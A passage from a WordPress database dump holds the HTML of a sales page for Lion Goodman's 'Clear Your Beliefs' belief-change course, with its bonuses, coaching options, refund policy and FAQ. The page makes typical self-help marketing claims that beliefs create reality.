program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">Optional: Professional Coaching Sessions</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>You can easily take this journey on your own, one recorded session at a time.  You also have the option of adding personalized support from a <em>Clear Your Beliefs Coach</em> – a qualified professional who will accompany you on your journey and guide you, step-by-step, through the process.\r\n\r\nOur outstanding coaches are trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\r\n\r\n<em>Clear Your Beliefs Coaches</em> are located throughout the United States and Canada, and worldwide, from Europe to Australia, and South Africa to Scandinavia. Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\r\n\r\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they’ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\r\n\r\nTake advantage of this up-close-and-personal support during the program.  Support sessions are optional, and are provided at an additional cost.  <strong>Choose the plan that suits you best - from the recorded program-only, to full support each week.</strong>\r\n\r\n&nbsp;\r\n<div class="icon_box" style="width: 760px; margin: 17px 0 17px -70px;">\r\n<h1>\r\nRegister Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world’s most powerful belief-change technologies, from the comfort of your own home.  Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="s20">Praise for Lion and Clear Your Beliefs</h1>\r\n[Place all testimonials here, in a wide box]\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n\r\nOR\r\n\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<h1>Frequently Asked Questions</h1>\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n<strong>Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n<strong>Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n<strong>Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n<strong>Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n<strong>Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.\r\n\r\n<script>// <![CDATA[\r\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\r\n// ]]></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-19 02:06:28', '2014-06-19 07:06:28', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1052, 2, '2014-06-19 02:19:56', '2014-06-19 07:19:56', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations...</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy...</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; margin-left: 40px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" 